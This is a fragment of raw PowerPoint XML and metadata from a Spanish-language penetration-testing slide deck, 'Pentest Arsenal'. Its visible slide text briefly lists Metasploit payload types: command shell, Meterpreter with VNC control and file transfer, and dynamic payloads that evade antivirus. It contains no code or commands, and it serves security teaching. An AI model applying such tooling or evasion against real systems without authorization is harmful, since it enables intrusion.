                <a:srgbClr val="007DB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54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4242" y="1459929"/>
            <a:ext cx="10444899" cy="375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Metasploit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posee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480 payloads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Algunos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ellos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son:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="007DB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Command shell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permite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ejecutar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scripts y commandos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arbitrarios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Meterpreter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permite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control de la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pantalla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a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través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VNC, commandos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rápidos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subida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y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descarga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archivos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Dynamic payloads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permiten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evadir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antivirus,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generando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payloads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únicos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s-UY" sz="2600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="007DB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706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2841</TotalTime>
  <Words>1342</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>196</Paragraphs>
  <Slides>44</Slides>
  <Notes>5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</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>SFMono-Regular</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Vonique 92</vt:lpstr>
      <vt:lpstr>HACKED</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>PENTEST ARSENAL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¿PREGUNTAS?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Pentest Arsenal</dc:title>
  <dc:creator>Guillermo Rodriguez</dc:creator>
  <cp:lastModifiedBy>Guillermo Rodriguez</cp:lastModifiedBy>
  <cp:revision>76</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-04-24T01:22:55Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-05-10T20:08:17Z</dcterms:modified>
</cp:coreProperties>
</file>